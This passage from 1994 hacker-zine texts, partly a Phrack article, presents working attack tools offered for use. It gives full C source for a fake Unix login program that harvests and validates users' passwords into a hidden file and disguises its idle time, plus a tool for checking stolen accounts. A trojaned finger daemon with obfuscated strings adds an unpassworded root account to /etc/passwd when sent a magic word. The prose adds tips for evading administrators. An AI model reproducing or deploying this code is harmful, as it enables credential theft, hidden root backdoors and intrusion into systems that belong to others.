  8249. spoof then tries to validate the password. If both the i.d. & password
  8250. are valid, these will be stored in a file called .data, along with
  8251. additional information about the account taken directly from the password
  8252. file.
  8253.  
  8254. Now if, as in the case above, either the login name or password is
  8255. incorrect, the information is discarded, and the login spoof runs again,
  8256. waiting for a valid user i.d. & password to be entered.
  8257.  
  8258. Also, a lot of systems these days have an unpassworded account called
  8259. 'sync', which when logged onto, usually displays the date & time the
  8260. sync account was last logged into, and from which server or tty,
  8261. the message of the day, syncs the disk, and then logs you straight out.
  8262.  
  8263. A few people have decided that the best way to dodge login spoofs is to
  8264. first login to this account then when they are automatically logged out,
  8265. to login to their own account.
  8266.  
  8267. They do this firstly, so that if a spoof is running it only records the
  8268. details of the sync account and secondly the spoof would not act as the
  8269. normal unix login program would, and therefore they would spot it and report
  8270. it, thus landing you in the shit with the system administrator.
  8271.  
  8272. However, I got around this problem so that when someone
  8273. tries to login as sync (or another account of a similar type, which you can
  8274. define), it acts exactly like the normal login program would, right down to
  8275. displaying the system date & time as well as the message of the day!!
  8276.  
  8277.  
  8278.                           The idle time facility
  8279.                           ----------------------
  8280.  
  8281. One of the main problems with unix spoofs, is they can be spotted
  8282. so easily by the administrator, as he/she could get a list of current
  8283. users on the system and see that an account was logged on, and had been
  8284. idle for maybe 30 minutes. They would then investigate & the spoof
  8285. would be discovered.
  8286.  
  8287. I have therefore incorporated a scheme in the spoof whereby
  8288. approx. every minute, the tty the spoof is executed from, is 'touched'
  8289. with the current time, this effectively simulates terminal activity &
  8290. keeps the terminals idle time to zero, which helps the spoofs chances
  8291. of not being discovered greatly.
  8292.  
  8293. The spoof also incorporates a routine which will automatically
  8294. keep track of approximately how long the spoof has been running, and if
  8295. it has been running for a specified time without grabbing an i.d. or password,
  8296. will automatically exit and run the real login program.
  8297. This timer is by default set to 12.5 minutes, but you can alter this time
  8298. if you wish.
  8299.  
  8300. Note: Due to the varying processing power of some systems, I could not
  8301.       set the timer to exactly 60 seconds, I have therefore set it to 50,
  8302.       incase it loses or gains extra time. Take this into consideration when
  8303.       setting the spoofs timer to your own value. I recommend you
  8304.       stick with the default, and under no circumstances let it run
  8305.       for hours.
  8306.  
  8307.  
  8308.  
  8309.                       Password Validation techniques
  8310.                       ------------------------------
  8311.  
  8312. The spoof basically uses 2 methods of password validation(or none at
  8313. all on a shadowed system V). Firstly, when the spoof is used on any unix
  8314. with an unshadowed password file, it uses the crypt function to validate a
  8315. password entered. If however the system is running SUNOS 4.1.+ and
  8316. incorporates the shadow password system, the program uses a function called
  8317. pwdauth(). This takes the login i.d. & decrypted password as its arguments
  8318. and checks to see if both are valid by encrypting the password and
  8319. comparing it to the shadowed password file which is usually located in
  8320. /etc/security and accessible only by root. By validating both the i.d. &
  8321. password we ensure that the data which is saved to file is correct and not
  8322. any old bullshit typed at the terminal!!!
  8323.  
  8324.  
  8325.  
  8326.                             Executing the Spoof
  8327.                             -------------------
  8328.  
  8329.  
  8330. ok, now about the program. This is written in ANSI-C, so I hope you have a
  8331. compatible compiler, GCC or suns ACC should do it. Now the only time you
  8332. will need to change to the code is in the following circumstances :-
  8333.  
  8334. 1) If you are to compile & run it on an unshadowed unix,
  8335.    in which case remove all references to the pwdauth() function,
  8336.    from both the declarations & the shadow checking routine, add
  8337.    this code in place of the shadow password checking routine :-
  8338.  
  8339.         if ( shadow == 1 ) {
  8340.              invalid = 0;
  8341.           else
  8342.              invalid = 1;
  8343.        }
  8344.  
  8345. 2) Add the above code also to the spoof if you are running this on a system
  8346.    V which is shadowed. In this case the spoof loses its ability to
  8347.    validate the password, to my knowledge there is no sysV equivalent
  8348.    of the pwdauth() function.
  8349.  
  8350. Everything else should be pretty much compatible. You should have no
  8351. problems compiling & running this on an unshadowed SUNOS machine, if
  8352. you do, make the necessary changes as above, but it compiled ok
  8353. on every unshadowed SUNOS I tested it on. The Spoof should
  8354. automatically detect whether a SUNOS system is shadowed or unshadowed
  8355. and run the appropriate code to deal with each situation.
  8356.  
  8357. Note: when you have compiled this spoof, you MUST 'exec' it from the
  8358.       current shell for it to work, you must also only have one shell
  8359.       running. e.g. from C or Bourne shell using the GNU C Compiler do :-
  8360.  
  8361. $ gcc spoof.c -o spoof
  8362. $ exec spoof
  8363.  
  8364. This replaces the current shell with the spoof, so when the spoof quits &
  8365. runs the real login program, the hackers account is effectively logged off.
  8366.  
  8367. ok enough of the bullshit, here's the spoof :-
  8368.  
  8369.  
  8370. ----------cut here-------------------------------------------------------
  8371.  
  8372. /* Program   : Unix login spoof
  8373.    Author    : The Shining/UPi (UK Division)
  8374.    Date      : Released 12/4/94
  8375.    Unix Type : All unshadowed unix systems &
  8376.                shadowed SUNOS systems
  8377.    Note      : This file MUST be exec'd from the shell. */
  8378.  
  8379.  
  8380. #include <stdio.h>
  8381. #include <string.h>
  8382. #include <signal.h>
  8383. #include <pwd.h>
  8384. #include <time.h>
  8385. #include <utime.h>
  8386.  
  8387. #define OUTFILE ".data"           /* Data file to save account info into */
  8388. #define LOGPATH "/usr/bin/login"  /* Path of real login program */
  8389. #define DUMMYID "sync"            /* Dummy account on your system */
  8390. #define DLENGTH 4                 /* Length of dummy account name */
  8391.  
  8392.  
  8393. FILE *fp;
  8394.  
  8395.  
  8396. /* Set up variables to store system time & date */
  8397.  
  8398. time_t now;
  8399.  
  8400. static int time_out, time_on, no_message, loop_cnt;
  8401.  
  8402.  
  8403. /* Set up a structure to store users information */
  8404.  
  8405. struct loginfo {
  8406.               char logname[10];
  8407.               char key[9];
  8408.               char *comment;
  8409.               char *homedir;
  8410.               char *shell;
  8411.             } u;
  8412.  
  8413.  
  8414. /* Use the unix function getpass() to read user password and
  8415.    crypt() or pwdauth()  (remove it below if not SUNOS)
  8416.    to validate it etc */
  8417.  
  8418. char *getpass(), *gethostname(), *alarm(), *sleep(),
  8419.      *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
  8420.      pass[14], salt[3], *tty, cons[] = " on console ",
  8421.      hname[72], *ld;
  8422.  
  8423.  
  8424. /* flag = exit status, ppid = pid shell, wait = pause length,
  8425.    pwstat = holds 0 if valid password, shadow holds 1 if shadow
  8426.    password system is being used, 0 otherwise. */
  8427.  
  8428. int flag, ppid, wait, pwstat, shadow, invalid;
  8429.  
  8430.  
  8431. /* Declare main functions */
  8432.  
  8433.      void write_details(struct loginfo *);
  8434.      void catch( void ), disable_interrupts( void );
  8435.      void log_out( void ), get_info( void ),
  8436.           invalid_login( void ), prep_str( char * );
  8437.  
  8438.  
  8439. /* set up pointer to point to pwfile structure, and also
  8440.    a pointer to the utime() structure */
  8441.  
  8442.  
  8443. struct passwd *pwentry, *getpwnam();
  8444. struct utimbuf *times;
  8445.  
  8446.  
  8447. int main( void )
  8448. {
  8449. system("clear");
  8450.  
  8451. /* Initialise main program variables to 0, change 'loop_cnt' to 1
  8452.    if you do not want the machines host name to appear with
  8453.    the login prompt! (e.g. prompt is `login:` instead of
  8454.    'MIT login:'  etc) */
  8455.  
  8456.      wait = 3;               /* Holds value for pause */
  8457.       flag = 0;              /* Spoof ends if value is 1 */
  8458.        loop_cnt = 0;         /* Change this to 1 if no host required */
  8459.        time_out = 0;         /* Stops timer if spoof has been used */
  8460.       time_on = 0;           /* Holds minutes spoof has been running */
  8461.      disable_interrupts();   /* Call function to disable Interrupts */
  8462.  
  8463.  
  8464. /* Get system time & date and store in log_date, this is
  8465.    displayed when someone logs in as 'sync' */
  8466.  
  8467.  now = time(NULL);
  8468.   strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  8469.   strcat(log_date, cons);
  8470.  ld = log_date;
  8471.  
  8472.  
  8473. /* Get Hostname and tty name */
  8474.  
  8475. gethostname(hname, 64);
  8476.  strcat(hname, " login: ");
  8477. tty = ttyname();
  8478.  
  8479.  
  8480. /* main routine */
  8481.  
  8482.   while( flag == 0 )
  8483.   {
  8484.        invalid = 0;        /* Holds 1 if id +/or pw are invalid */
  8485.         shadow = 0;        /* 1 if shadow scheme is in operation */
  8486.          no_message = 0;   /* Flag for Login Incorrect msg */
  8487.         alarm(50);         /* set timer going */
  8488.        get_info();         /* get user i.d. & password */
  8489.  
  8490.  
  8491. /* Check to see if the user i.d. entered is 'sync', if it is
  8492.    display system time & date, display message of the day and
  8493.    then run the spoof again, insert the account of your
  8494.    choice here, if its not sync, but remember to put
  8495.    the length of the accounts name next to it! */
  8496.  
  8497.      if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
  8498.         printf("%s\n", ld);
  8499.  
  8500.           if ((fp = fopen("/etc/motd", "r")) != NULL) {
  8501.               while ((motd = getc(fp)) != EOF)
  8502.                      putchar(motd);
  8503.  
  8504.               fclose(fp);
  8505.           }
  8506.  
  8507.            printf("\n");
  8508.              prep_str(u.logname);
  8509.              no_message = 1;
  8510.            sleep(wait);
  8511.      }
  8512.  
  8513.  
  8514. /* Check if a valid user i.d. has been input, then check to see if
  8515.    the password system is shadowed or unshadowed.
  8516.    If both the user i.d. & password are valid, get additional info
  8517.    from the password file, and store all info in a file called .data,
  8518.    then exit spoof and run real login program */
  8519.  
  8520.     setpwent();   /* Rewind pwfile to beign processing */
  8521.  
  8522.  
  8523.     if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
  8524.          invalid = 1;
  8525.         flag = 0;
  8526.     }
  8527.     else
  8528.        strncpy(salt, pwentry->pw_passwd, 2);
  8529.  
  8530.  
  8531. /* Check for shadowed password system, in SUNOS, the field in /etc/passwd
  8532.    should begin with '##', in system V it could contain an 'x', if none
  8533.    of these exist, it checks that the entry = 13 chars, if less then
  8534.    shadow system will probably be implemented (unless acct has been
  8535.    disabled) */
  8536.  
  8537.  if ( invalid == 0 ) {
  8538.  
  8539.        if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
  8540.            shadow = 1;
  8541.        else
  8542.           if (strlen(pwentry->pw_passwd) < 13)
  8543.              shadow = 1;
  8544.  
  8545.  
  8546. /* If unshadowed, use the salt from the pwfile field & the key to
  8547.    form the encrypted password which is checked against the entry
  8548.    in the password file, if it matches, then all is well, if not,
  8549.    spoof runs again!! */
  8550.  
  8551.     if ( shadow != 1 ) {
  8552.  
  8553.       if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
  8554.          invalid = 0;
  8555.       else
  8556.          invalid = 1;
  8557.     }
  8558.  
  8559.  
  8560. /* If SUNOS Shadowing is in operation, use the pwdauth() function
  8561.    to validate the password, if not SUNOS, substitute this code
  8562.    with the routine I gave earlier! */
  8563.  
  8564.        if ( shadow == 1 ) {
  8565.           if (pwstat = pwdauth(u.logname, u.key) == NULL)
  8566.              invalid = 0;
  8567.           else
  8568.              invalid = 1;
  8569.        }
  8570. }
  8571.  
  8572.  
  8573. /* If we have a valid account & password, get user info from the
  8574.    pwfile & store it */
  8575.  
  8576.         if ( invalid == 0 ) {
  8577.  
  8578.            u.comment = pwentry->pw_gecos;
  8579.             u.homedir = pwentry->pw_dir;
  8580.            u.shell = pwentry->pw_shell;
  8581.  
  8582.           /* Open file to store user info */
  8583.  
  8584.            if ((fp = fopen(OUTFILE, "a")) == NULL)
  8585.               log_out();
  8586.  
  8587.                write_details(&u);
  8588.                 fclose(fp);
  8589.                 no_message = 1;
  8590.                flag = 1;
  8591.         }
  8592.         else
  8593.            flag = 0;
  8594.  
  8595.         invalid_login();
  8596.  
  8597.     endpwent();                       /* Close pwfile */
  8598.  
  8599.     if (no_message == 0)
  8600.        loop_cnt++;
  8601.  
  8602.   }                                  /* end while */
  8603.  
  8604. log_out();                           /* call real login program */
  8605.  
  8606. }
  8607.  
  8608.  
  8609. /* Function to read user i.d. & password */
  8610.  
  8611. void get_info( void )
  8612. {
  8613.    char user[11];
  8614.    unsigned int string_len;
  8615.  
  8616.    fflush(stdin);
  8617.     prep_str(u.logname);
  8618.     prep_str(u.key);
  8619.    strcpy(user, "\n");
  8620.  
  8621.  
  8622. /* Loop while some loser keeps hitting return when asked for user
  8623.    i.d. and if someone hits CTRL-D to break out of spoof. Enter
  8624.    a # at login to exit spoof. Uncomment the appropriate line(s)
  8625.    below to customise the spoof to look like your system */
  8626.  
  8627.   while ((strcmp(user, "\n") == NULL) && (!feof(stdin)))
  8628.   {
  8629.    /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */
  8630.  
  8631.     if (loop_cnt > 0)
  8632.        strcpy(hname, "login: ");
  8633.  
  8634.       printf("%s", hname);
  8635.       fgets(user, 9, stdin);
  8636.  
  8637.  
  8638.    /* Back door for hacker, # at present, can be changed,
  8639.       but leave \n in. */
  8640.  
  8641.      if (strcmp(user, "#\n") == NULL)
  8642.          exit(0);
  8643.  
  8644.  
  8645.     /* Strip \n from login i.d. */
  8646.  
  8647.      if (strlen(user) < 8)
  8648.         string_len = strlen(user) - 1;
  8649.      else
  8650.         string_len = strlen(user);
  8651.  
  8652.      strncpy(u.logname, user, string_len);
  8653.  
  8654.  
  8655.  
  8656. /* check to see if CTRL-D has occurred because it does not
  8657.    generate an interrupt like CTRL-C, but instead generates
  8658.    an end-of-file on stdin */
  8659.  
  8660.      if (feof(stdin)) {
  8661.          clearerr(stdin);
  8662.         printf("\n");
  8663.      }
  8664.  
  8665.   }
  8666.  
  8667.  
  8668.  
  8669. /* Turn off screen display & read users password */
  8670.  
  8671.      strncpy(u.key, getpass("Password:"), 8);
  8672.  
  8673. }
  8674.  
  8675.  
  8676.  
  8677. /* Function to increment the timer which holds the amount of time
  8678.    the spoof has been running */
  8679.  
  8680. void catch( void )
  8681. {
  8682.   time_on++;
  8683.  
  8684.  
  8685. /* If spoof has been running for 15 minutes, and has not
  8686.    been used, stop timer and call spoof exit routine */
  8687.  
  8688. if ( time_out == 0 ) {
  8689.    if (time_on == 15) {
  8690.        printf("\n");
  8691.         alarm(0);
  8692.        log_out();
  8693.    }
  8694. }
  8695.  
  8696.  
  8697. /* 'Touch' your tty, effectively keeping terminal idle time to 0 */
  8698.  
  8699.  utime(tty, times);
  8700. alarm(50);
  8701. }
  8702.  
  8703.  
  8704.  
  8705. /* Initialise a string with \0's */
  8706.  
  8707. void prep_str( char str[] )
  8708. {
  8709. int strl, cnt;
  8710.  
  8711. strl = strlen(str);
  8712. for (cnt = 0; cnt != strl; cnt++)
  8713.     str[cnt] = ' ';
  8714. }
  8715.  
  8716.  
  8717. /* function to catch interrupts, CTRL-C & CTRL-Z etc as
  8718.    well as the timer signals */
  8719.  
  8720. void disable_interrupts( void )
  8721. {
  8722.    signal(SIGALRM, catch);
  8723.     signal(SIGQUIT, SIG_IGN);
  8724.      signal(SIGTERM, SIG_IGN);
  8725.     signal(SIGINT, SIG_IGN);
  8726.    signal(SIGTSTP, SIG_IGN);
  8727. }
  8728.  
  8729.  
  8730. /* Write the users i.d., password, personal information, homedir
  8731.    and shell to a file */
  8732.  
  8733. void write_details(struct loginfo *sptr)
  8734. {
  8735.  
  8736.    fprintf(fp, "%s:%s:", sptr->logname, sptr->key);
  8737.     fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid);
  8738.      fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir);
  8739.     fprintf(fp, "%s\n", sptr->shell);
  8740.    fprintf(fp, "\n");
  8741. }
  8742.  
  8743.  
  8744.  
  8745. /* Display login incorrect only if the user hasn't logged on as
  8746.    'sync' */
  8747.  
  8748. void invalid_login( void )
  8749. {
  8750.  
  8751.          if ( flag == 1 && pwstat == 0 )
  8752.             sleep(wait);
  8753.  
  8754.          if ( no_message == 0 )
  8755.             printf("Login incorrect\n");
  8756. }
  8757.  
  8758.  
  8759. /* Displays appropriate message, exec's the real login program,
  8760.    this replaces the spoof & effectively logs spoof's account off.
  8761.    Note: this spoof must be exec'd from the shell to work */
  8762.  
  8763. void log_out( void )
  8764. {
  8765.   time_out = 1;
  8766.  
  8767.    if ( no_message == 1 ) {
  8768.         sleep(1);
  8769.        printf("Login incorrect\n");
  8770.    }
  8771.  
  8772.    execl(LOGPATH, "login", (char *)0);
  8773. }
  8774.  
  8775. ----------cut here-------------------------------------------------------
  8776.  
  8777. then delete the source, run it and wait for some sucker to login!.
  8778. If you do initially run this spoof from your account, I suggest you
  8779. remove it when you have grabbed someone's account and run it from theirs
  8780. from then on, this reduces your chances of being caught!
  8781.  
  8782.  
  8783.  
  8784.  
  8785.  
  8786.                       User i.d. & Password Validator
  8787.                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  8788.  
  8789. Now if you are familiar with the unix Crack program, as I'm sure most of
  8790. you are ;-), or if you have used my spoof to grab some accounts,
  8791. this little program could be of some use. Say you have snagged
  8792. quit a few accounts, and a few weeks later you wanna see if they are still
  8793. alive, instead of logging onto them, then logging out again 20 or 30 times
  8794. which can take time, and could get the system admin looking your way, this
  8795. program will continuously ask you to enter a user i.d. & password, then
  8796. validate them both by actually using the appropriate entry in the password
  8797. file. All valid accounts are then stored along with other info from the
  8798. password file, in a data file. The program loops around until you stop it.
  8799.  
  8800. This works on all unshadowed unix systems, and, you guessed it!, shadowed
  8801. SUNOS systems.
  8802.  
  8803. If you run it on an unshadowed unix other than SUNOS, remove all references
  8804. to pwdauth(), along with the shadow password file checking routine,
  8805. if your on sysV, your shit outa luck! anyway, here goes :-
  8806.  
  8807.  
  8808. ---cut here---------------------------------------------------------------
  8809.  
  8810. /* Program   : To validate accounts & passwords on both
  8811.                shadowed & unshadowed unix systems.
  8812.    Author    : The Shining/UPi (UK Division)
  8813.    Date      : Released 12/4/94
  8814.    UNIX type : All unshadowed systems, and SUNOS shadowed systems */
  8815.  
  8816.  
  8817. #include <stdio.h>
  8818. #include <string.h>
  8819. #include <pwd.h>
  8820.  
  8821.  
  8822. FILE *fp;
  8823.  
  8824.  
  8825. int pw_system( void ), shadowed( void ), unshadowed( void );
  8826. void write_info( void ), display_notice( void );
  8827.  
  8828. struct passwd *pwentry, *getpwnam();
  8829.  
  8830. struct user {
  8831.        char logname[10];
  8832.        char key[9];
  8833.        char salt[3];
  8834. } u;
  8835.  
  8836.  
  8837. char *getpass(), *pwdauth(), *crypt(), ans[2];
  8838. int invalid_user, stat;
  8839.  
  8840.  
  8841. int main( void )
  8842. {
  8843.  
  8844.  strcpy(ans, "y");
  8845.  
  8846.  while (strcmp(ans, "y") == NULL)
  8847.  {
  8848.    invalid_user = stat = 0;
  8849.     display_notice();
  8850.      printf("Enter login id:");
  8851.     scanf("%9s", u.logname);
  8852.    strcpy(u.key, getpass("Password:"));
  8853.  
  8854.  
  8855.  setpwent();
  8856.  
  8857.    if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
  8858.       invalid_user = 1;
  8859.    else
  8860.       strncpy(u.salt, pwentry->pw_passwd, 2);
  8861.  
  8862.  
  8863.  if (invalid_user != 1) {
  8864.  
  8865.    if ((stat = pw_system()) == 1) {
  8866.       if ((stat = unshadowed()) == NULL) {
  8867.            printf("Unshadowed valid account! - storing details\n");
  8868.           write_info();
  8869.       }
  8870.    }
  8871.    else
  8872.      if ((stat = shadowed()) == NULL) {
  8873.           printf("SUNOS Shadowed valid account! - storing details\n");
  8874.          write_info();
  8875.      }
  8876.      else
  8877.         invalid_user = 2;
  8878.  
  8879.  }
  8880.  
  8881.  
  8882.     if (invalid_user == 1)
  8883.        printf("User unknown/not found in password file\n");
  8884.  
  8885.     if (invalid_user == 2 )
  8886.        printf("Password invalid\n");
  8887.  
  8888.        printf("\n\nValidate another account?(y/n): ");
  8889.        scanf("%1s", ans);
  8890.  
  8891.  endpwent();
  8892.  }
  8893. }
  8894.  
  8895.  
  8896. /* Check to see if shadow password system is used, in SUNOS the field
  8897.    in /etc/passwd starts with a '#', if not, check to see if entry
  8898.    is 13 chars, if not shadow must be in use. */
  8899.  
  8900. int pw_system( void )
  8901. {
  8902.    if (strlen(pwentry->pw_passwd) != 13)
  8903.       return(0);
  8904.    else
  8905.       if (strcmp(u.salt, "##") == NULL)
  8906.          return(0);
  8907.       else
  8908.          return(1);
  8909. }
  8910.  
  8911.  
  8912. /* If system is unshadowed, get the 2 character salt from the password
  8913.    file, and use this to encrypt the password entered. This is then
  8914.    compared against the password file entry. */
  8915.  
  8916. int unshadowed( void )
  8917. {
  8918. if (pwentry->pw_passwd == crypt(u.key, u.salt))
  8919.    return(0);
  8920. else
  8921.    return(1);
  8922. }
  8923.  
  8924.  
  8925. /* If SUNOS shadowe system is used, use the pwdauth() function to validate
  8926.    the password stored in the /etc/security/passwd.adjunct file */
  8927.  
  8928. int shadowed( void )
  8929. {
  8930. int pwstat;
  8931.  
  8932. if (pwstat = pwdauth(u.logname, u.key) == NULL)
  8933.    return(0);
  8934. else
  8935.    return(1);
  8936. }
  8937.  
  8938.  
  8939. /* Praise myself!!!! */
  8940.  
  8941. void display_notice( void )
  8942. {
  8943. system("clear");
  8944.  printf("Unix Account login id & password validator.\n");
  8945.  printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
  8946. printf("(c)1994 The Shining\n\n\n\n");
  8947. }
  8948.  
  8949.  
  8950. /* Open a file called 'data' and store account i.d. & password along with
  8951.    other information retrieved from the password file */
  8952.  
  8953. void write_info( void )
  8954. {
  8955.  
  8956. /* Open a file & store account information from pwfile in it */
  8957.  
  8958. if ((fp = fopen("data", "a")) == NULL) {
  8959.      printf("error opening output file\n");
  8960.     exit(0);
  8961. }
  8962.  
  8963. fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
  8964.  fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
  8965.  fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
  8966. fclose(fp);
  8967. }
  8968.  
  8969. -----cut here------------------------------------------------------------------
  8970.  
  8971.  
  8972.  
  8973. The above programs will not compile under non-ansi C compilers without quite
  8974. a bit of modification. I have tested all these programs on SUNOS both
  8975. shadowed & unshadowed, though they should work on other systems with
  8976. little modification (except the shadow password cracker, which is SUNOS
  8977. shadow system specific).
  8978.  
  8979.  
  8980. Regards to the following guys :-
  8981.  
  8982.  
  8983. Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
  8984. the guys at United International Perverts(yo Dirty Mac & Jasper!)
  8985. and all I know.
  8986.  
  8987.  
  8988. (c) 1994 The Shining (The NORTH!, U.K.)
  8989.  
  8990. *******************************************************************************
  8991.                               ==Phrack Magazine==
  8992.  
  8993.                  Volume Five, Issue Forty-Six, File 12 of 28
  8994.  
  8995. ****************************************************************************
  8996.  
  8997.  
  8998.  
  8999. The fingerd trojan horse
  9000. Original article by Hitman Italy for Phrack Inc.
  9001.  
  9002. This article is for informational purpose only, I'm not liable for
  9003. any damage or illegal activity perpetrated using the source or the
  9004. informations in the article.
  9005.  
  9006. -=- + -
  9007.  
  9008. So you have gained access to a system and want to keep on hacking without
  9009. being kicked off by a smart operator, there are dozen methods you can use,
  9010. usually, if an operator figure out that his system is under attack, he'll
  9011. check out the login program and telnetd for backdoors, then the telnet for
  9012. logging activities or network sniffers and so on..  if nothing is found
  9013. he'll realize the hacker is a dumb ass and he'll just modify the passwd to
  9014. prevent him from logging on (in most cases), here comes my fingerd trojan.
  9015. This scheme is quite original (I've never seen it used) and the source is
  9016. compact enough to be fitted into a MAG.  The fingerd as all you know (I
  9017. hope) is the finger server run by inetd when a client opens the finger
  9018. port (N.79), of course if the port is locked, or you have a network
  9019. firewall, do not use this code.
  9020.  
  9021. ---------- + CUT HERE + -----------------------------------------------
  9022.  
  9023. /*  The Fingerd trojan by Hitman Italy
  9024.  *  This source cannot be spread without the whole article
  9025.  *  but you can freely implement or modify it for personal use
  9026.  */
  9027.  
  9028. static char copyright[] = "";   /* Add the copyright string here */
  9029.  
  9030. static char sccsid[] = "";      /* Add the sccsid string here */
  9031.  
  9032.  
  9033. #include <stdio.h>
  9034.  
  9035. #define PATH_FINGER "/usr/ucb/finger"
  9036. #define CODE 161
  9037.  
  9038. char *HitCrypt(ch)
  9039. char *ch;
  9040. {
  9041.    char *b;
  9042.    b=ch;
  9043.    while ((*(ch++)^=CODE)!=0x00);
  9044.    return(b);
  9045. }
  9046.  
  9047. main(argc,argv)
  9048. int argc;
  9049. char *argv[];
  9050. {
  9051.    register FILE *fp;
  9052.    register int ch;
  9053.    register char *lp;
  9054.    int p[2];
  9055.  
  9056. static char exor[4][23]={
  9057. {201,200,213,CODE},
  9058. {142,196,213,194,142,209,192,210,210,214,197,CODE},
  9059. {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
  9060. 210,201,CODE},
  9061. {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
  9062. 143,143,143,CODE} };
  9063.  
  9064. #define   ENTRIES   50
  9065.    char **ap, *av[ENTRIES + 1], line[1024], *strtok();
  9066.  
  9067. #ifdef LOGGING               /* unused, leave it for "strings" command */
  9068. #include <netinet/in.h>
  9069.    struct sockaddr_in sin;
  9070.    int sval;
  9071.  
  9072.    sval = sizeof(sin);
  9073.    if (getpeername(0, &sin, &sval) < 0)
  9074.       fatal(argv[0],"getpeername");
  9075. #endif
  9076.  
  9077.    if (!fgets(line, sizeof(line), stdin))
  9078.       exit(1);
  9079.  
  9080.    av[0] = "finger";
  9081.  
  9082.    for (lp = line, ap = &av[1];;) {
  9083.       *ap = strtok(lp, " \t\r\n");
  9084.       if (!*ap)
  9085.          break;
  9086.       if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
  9087.          *ap = "-l";
  9088.       if (++ap == av + ENTRIES)
  9089.          break;
  9090.       lp = NULL;
  9091.    }
  9092.  
  9093.    if (pipe(p) < 0)
  9094.       fatal(argv[0],"pipe");
  9095.  
  9096.    switch(fork()) {
  9097.    case 0:
  9098.       (void)close(p[0]);
  9099.       if (p[1] != 1) {
  9100.          (void)dup2(p[1], 1);
  9101.          (void)close(p[1]);
  9102.       }
  9103.  
  9104. /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
  9105.    if (av[1])
  9106.        if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
  9107.         if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
  9108.          _exit(10);
  9109.         fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
  9110.         printf("%s\n", HitCrypt(&exor[3][0]));
  9111.         fclose(fp);
  9112.         break;
  9113.        }
  9114. /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
  9115.  
  9116.         if (execv(PATH_FINGER, av)==-1)
  9117.          fprintf(stderr,"No local finger program found\n");
  9118.       _exit(1);
  9119.    case -1:
  9120.       fatal(argv[0],"fork");
  9121.    }
  9122.    (void)close(p[1]);
  9123.    if (!(fp = fdopen(p[0], "r")))
  9124.       fatal(argv[0],"fdopen");
  9125.    while ((ch = getc(fp)) != EOF) {
  9126.       putchar(ch);
  9127.    }
  9128.    exit(0);
  9129. }
  9130.  
  9131. fatal(prg,msg)
  9132.  
  9133.    char *prg,*msg;
  9134. {
  9135.    fprintf(stderr, "%s: ", prg);
  9136.    perror(msg);
  9137.    exit(1);
  9138. }
  9139.  
  9140. --------- + CUT HERE + ----------------------------------------------
  9141.  
  9142. I think it's quite easy to understand, first of all, inetd opens the
  9143. socket and pipes the the input data through the fingerd
  9144.  
  9145. *  if (!fgets(line, sizeof(line), stdin))
  9146. *     exit(1);
  9147. *   av[0] = "finger";
  9148. *   for (lp = line, ap = &av[1];;) {
  9149. *      *ap = strtok(lp, " \t\r\n");
  9150. *      if (!*ap)
  9151. *         break;
  9152. *      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
  9153. *         *ap = "-l";
  9154.  
  9155. here it gets the data from stdin and parses them (strtok) converting (due
  9156. to RFC742) any '/W' or '/w' old options in '-l'
  9157.  
  9158. *    switch(fork()) {
  9159. *   case 0:
  9160. *      (void)close(p[0]);
  9161. *      if (p[1] != 1) {
  9162. *         (void)dup2(p[1], 1);
  9163. *         (void)close(p[1]);
  9164. *      }
  9165.  
  9166. the task goes into the background
  9167.  
  9168. *        if (execv(PATH_FINGER, av)==-1)
  9169. *         fprintf(stderr,"No local finger program found\n");
  9170.  
  9171. here the daemon executes the local finger with remote parameters
  9172.  
  9173. *   (void)close(p[1]);
  9174. *   if (!(fp = fdopen(p[0], "r")))
  9175. *      fatal(argv[0],"fdopen");
  9176. *   while ((ch = getc(fp)) != EOF) {
  9177. *      putchar(ch);
  9178.  
  9179. the output is piped back to the remote system
  9180.  
  9181. That's how the finger daemon works...  now the trojan, basically we'll
  9182. check out the input finger user till the magic code matches, then our
  9183. sleepin' trojan will wake up and do the job...  let's examine my code
  9184. (decrypted)
  9185.  
  9186. /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
  9187.    if (av[1])
  9188.        if (strcmp("hit",av[1])==0) {
  9189.         if(!(fp=fopen("/etc/passwd","a")))
  9190.          _exit(10);
  9191.         fprintf(fp,"hit::0:0::/:/bin/csh\n");
  9192.         printf("Backdoor activated...\n");
  9193.         fclose(fp);
  9194.         break;
  9195.        }
  9196. /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
  9197.  
  9198. When the "hit" magic code matches the trojan will modify the passwd adding
  9199. a fake unpassworded root user named "hit", so you can relogin as root,
  9200. cover your tracks and keep on working.  Of course this is an example, you
  9201. can do what you want simply adding your custom code, you may remote cat a
  9202. log file without logging in, or remote kill an user, maybe root logins are
  9203. disabled so you have to make a suid shell and add a normal entry in the
  9204. passwd or open a port and so on, you can also use multiple codes if you
  9205. like.  If the magic word doesn't match of course the finger will work out
  9206. normally.
  9207.  
  9208. <example>
  9209. # finger hit@666.666.666.666
  9210. [666.666.666.666]
  9211. Backdoor activated...
